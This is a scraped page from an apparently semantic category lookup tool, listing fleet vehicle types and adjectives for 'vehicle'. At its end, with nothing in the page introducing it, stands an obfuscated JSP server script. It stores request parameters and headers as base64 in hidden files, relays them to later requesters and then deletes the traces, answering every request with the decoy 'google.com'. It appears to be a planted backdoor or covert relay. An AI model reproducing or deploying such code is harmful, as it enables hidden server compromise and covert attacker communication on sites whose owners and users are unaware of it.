Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Members for Fine-Grained Categories
fleet_vehicle
:
bus,
truck,
tractor,
rental_car,
semitrailer,
taxicab,
transit_bus,
limousine,
ambulance,
urban_bus,
train,
taxi_cab,
installation_van,
ox_van,
van,
city_bus,
boat,
light_truck,
submarine,
lorry,
sedan,
automobile,
car,
compact,
cargo_van,
bucket_truck,
emergency_vehicle,
coach,
cruiser,
courier_vehicle,
transport,
utility_truck,
forklift,
bulldozer,
sanitation_truck,
smaller_car,
cube_van,
pool_car,
government_vehicle,
motorcycle,
dumper,
pickup_truck,
trash_truck,
larger_truck,
scooter,
plane,
commuter_bus,
mail_truck,
government_truck,
battleship,
recycling_truck,
council_van,
taxi,
officer_vehicle,
light_van,
wagon,
cargo_trailer,
bike,
frigate,
commercial_taxicab,
delivery_vehicle,
large_truck,
airport_carrier,
postal_truck,
Modifiers matching
vehicle
:
moving,
utilitarian,
wooden,
large,
controlled,
top,
outside,
agricultural,
recreational,
radio,
comfortable,
commercial,
nautical,
armored,
motorized,
medical,
military,
ordinary,
functional,
foreign,
heavier,
heavy,
larger,
particular,
noisy,
electronic,
metal,
professional,
robotic,
advanced,
indoor,
quiet,
bulky,
starting,
civil,
costly,
slow,
autonomous,
rolling,
cleaner,
underwater,
occupational,
virtual,
familiar,
immovable,
fighting,
flat,
individual,
industrial,
magic,
wide,
small,
useful,
automotive,
mechanical,
rigid,
expensive,
public,
motor,
base,
single,
electric,
non-standard,
additional,
quick,
overhead,
usual,
sized,
lightweight,
old,
active,
cultural,
enough,
seasonal,
related,
narrative,
typical,
destructive,
noncommercial,
operational,
painted,
driving,
huge,
strong,
appropriate,
local,
editorial,
private,
friendly,
open,
unusual,
topped,
fleet,
deadly,
accessible,
visible,
skinned,
flying,
miscellaneous,
moveable,
bigger,
specialized,
down,
world,
empty,
refrigerated,
wonderful,
soft,
practical,
supporting,
bodied,
conventional,
out,
cool,
fast,
mobile,
urgent,
powerful,
crowded,
civilian,
armoured,
domestic,
real,
marine,
slower,
static,
hard,
big,
relevant,
streamlined,
traditional,
inefficient,
high,
dynamic,
massive,
technical,
automatic,
valuable,
working,
premium,
mechanized,
specified,
ballistic,
standard,
airborne,
urban,
outdoor,
dangerous,
sporting,
actual,
temporary,
combustible,
disabled,
ancillary,
financial,
lethal,
movable,
western,
essential,
portable,
contemporary,
surplus,
specialised,
critical,
remote,
simple,
long,
peacekeeping,
rare,
complex,
undersea,
sophisticated,
elevated,
motorised,
impenetrable,
oversized,
flexible,
floating,
abandoned,
physical,
common,
rental,
everyday,
smaller,
extra,
unmanned,
dignified,
reflective,
compact,
promotional,
earthbound,
special,
buoyant,
naval,
penetrating,
loud,
suburban,
municipal,
modern,
exotic,
sliding,
dilapidated,
robust,
primary,
electrical,
efficient,
size,
rugged,
driven,
pedal,
nonmilitary,
interactive,
dun,
secure,
stationary,
unstable,
auxiliary,
original,
new,
light,
useless,
model,
hybrid,
wired,
closed,
inside,
personal,
tactical,
tall,
terrestrial,
covered,
lighter,
manufactured,
unique,
back,
aerodynamic,
Simple categories matching
fleet
:
information,
unit,
operator,
vehicle,
group,
game,
owner,
car,
equipment,
user,
carrier,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>